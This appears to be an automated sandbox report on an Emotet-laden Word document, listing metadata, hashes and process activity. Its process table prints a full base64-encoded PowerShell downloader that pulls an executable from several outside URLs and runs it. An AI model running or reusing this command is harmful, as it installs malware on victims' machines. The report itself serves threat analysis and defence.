File name: | q0h1u1i84 |
Full analysis: | https://app.any.run/tasks/cbd2e95e-c935-46e1-8fac-236f2aba74e1 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | August 08, 2020, 09:52:40 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Odio., Author: Marie Guillot, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Aug 7 22:57:00 2020, Last Saved Time/Date: Fri Aug 7 22:57:00 2020, Number of Pages: 1, Number of Words: 4, Number of Characters: 24, Security: 0 |
MD5: | 1AAE29C4728ACC0BAB6D5A49CCC625CB |
SHA1: | B7380461EC30092F123532D85E37A60FBE2E3C48 |
SHA256: | 8BB0E69180AAD1D96C179FB624FA5B9D2455C62A298CB3C1F9CDB059C8049478 |
SSDEEP: | 3072:S4PrXcuQuvpzm4bkiaMQgAlSs5RA+ZwM3RQ:TDRv1m4bnQgISsrAYwM3RQ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Odio. |
---|---|
Subject: | - |
Author: | Marie Guillot |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:08:07 21:57:00 |
ModifyDate: | 2020:08:07 21:57:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 24 |
Security: | None |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 27 |
AppVersion: | 15 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CodePage: | Unicode UTF-16, little endian |
LocaleIndicator: | 1033 |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1672 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\q0h1u1i84.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
472 | powersheLL -e JABLAEUAQwBOAEMAbgBtAGMAPQAnAEIAWABKAE0ASgBnAGgAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIASQBUAHkAcABgAFIAYABvAHQAbwBgAGMAbwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAVgBPAFoATABNAG8AcAB3ACAAPQAgACcANQA0ADMAJwA7ACQATwBVAEwASwBBAGcAZABvAD0AJwBOAEkAQwBJAEEAZgBjAGUAJwA7ACQASQBBAE0AUABMAGIAYQBsAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABWAE8AWgBMAE0AbwBwAHcAKwAnAC4AZQB4AGUAJwA7ACQAVgBYAFoAQwBKAGYAeQBvAD0AJwBJAEUAVABEAEsAegBoAGgAJwA7ACQAVgBHAFMAVwBQAGkAawBvAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABuAEUAdAAuAHcARQBCAEMATABpAEUAbgB0ADsAJABFAEcATgBMAE0AZgB5AGMAPQAnAGgAdAB0AHAAOgAvAC8AZQBsAGQAaQBvAHMAcwB0AG8AcgBlAC4AYwBvAG0ALwBjAHMAcwAvAHEAcABmAHYAXwBlAF8AeQAzAGwAawAwAHMAcAA2AGkALwAqAGgAdAB0AHAAOgAvAC8AbAB1AGMAawB5AG0AZQAyADQANwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AcQBhAHcAcAB3AF8AdgAxAF8AZwBoAGUAMQB3AG0AegB4AHoAYwAvACoAaAB0AHQAcAA6AC8ALwB2AGEAbgBkAGEAbQBlAGIAdQBpAGwAZABlAHIAcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZQAyAGsAeQBfADEAOABqADgAXwB3AG4ANAB2AC8AKgBoAHQAdABwADoALwAvAGQAZQBzAGUAcgB2AGkAbgBnAHYAZQB0AGUAcgBhAG4AcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZgB5AF8ANABiAHEAZQBfAHoAdQA2AGUAdwAvACoAaAB0AHQAcAA6AC8ALwBjAHMAbQBiAHUAaQBsAGQAZQByAHMAbABsAGMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHQAZQBxAHYAbQBfAG4AMAB5AGEAaQBfADgANAAvACcALgAiAFMAYABwAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAWQBUAEIARwBaAHoAdABvAD0AJwBaAFAASQBHAEcAYgBpAGcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFkAVQBRAFgAVwBmAG0AaQAgAGkAbgAgACQARQBHAE4ATABNAGYAeQBjACkAewB0AHIAeQB7ACQAVgBHAFMAVwBQAGkAawBvAC4AIgBkAE8AdwBuAEwAYABPAGAAQQBkAGYAaQBgAEwARQAiACgAJABZAFUAUQBYAFcAZgBtAGkALAAgACQASQBBAE0AUABMAGIAYQBsACkAOwAkAEkATABMAEcATABtAHEAdQA9ACcAWgBKAFkAQwBCAHQAYQBlACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQASQBBAE0AUABMAGIAYQBsACkALgAiAGwAZQBOAGAARwBgAFQASAAiACAALQBnAGUAIAAyADgANwA2ADYAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAGUAQQBgAFQARQAiACgAJABJAEEATQBQAEwAYgBhAGwAKQA7ACQATwBZAEEASgBVAHIAegB5AD0AJwBCAFgAUwBVAEQAagB5AHYAJwA7AGIAcgBlAGEAawA7ACQAUwBIAE8AUABGAHAAdABmAD0AJwBYAE8AUABHAEMAcQBsAHIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQBDAFIATwBNAG8AagBzAD0AJwBIAE8AVQBTAEQAeABoAG0AJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe | — | WmiPrvSE.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3972 | "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s | C:\Windows\system32\mmc.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Management Console Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2968 | "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s | C:\Windows\system32\mmc.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft Management Console Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2340 | "C:\Windows\system32\taskmgr.exe" /4 | C:\Windows\system32\taskmgr.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Task Manager Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3852 | "C:\Program Files\CCleaner\CCleaner.exe" | C:\Program Files\CCleaner\CCleaner.exe | — | explorer.exe |
User: admin Company: Piriform Ltd Integrity Level: MEDIUM Description: CCleaner Exit code: 0 Version: 5, 35, 0, 6210 | ||||
3436 | "C:\Program Files\CCleaner\CCleaner.exe" /uac | C:\Program Files\CCleaner\CCleaner.exe | taskeng.exe | |
User: admin Company: Piriform Ltd Integrity Level: HIGH Description: CCleaner Version: 5, 35, 0, 6210 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR7BD1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF29B1BE0209D75C83.TMP | — | |
MD5:— | SHA256:— | |||
1672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFAF75186476751082.TMP | — | |
MD5:— | SHA256:— | |||
472 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DFQH3G3XWV47Q86LVXLU.temp | — | |
MD5:— | SHA256:— | |||
1672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFDAED7E0DB73E0287.TMP | — | |
MD5:— | SHA256:— | |||
1672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFA572A26085408727.TMP | — | |
MD5:— | SHA256:— | |||
1672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF2424821664242E50.TMP | — | |
MD5:— | SHA256:— | |||
1672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF7739CDAF095FF4B5.TMP | — | |
MD5:— | SHA256:— | |||
1672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{47360C42-CFAB-4E85-A859-CBD535055CFD}.tmp | — | |
MD5:— | SHA256:— | |||
1672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF0FEDA5B546C46A30.TMP | — | |
MD5:— | SHA256:— |
Process | Message |
---|---|
mmc.exe | Constructor: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | OnInitialize: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|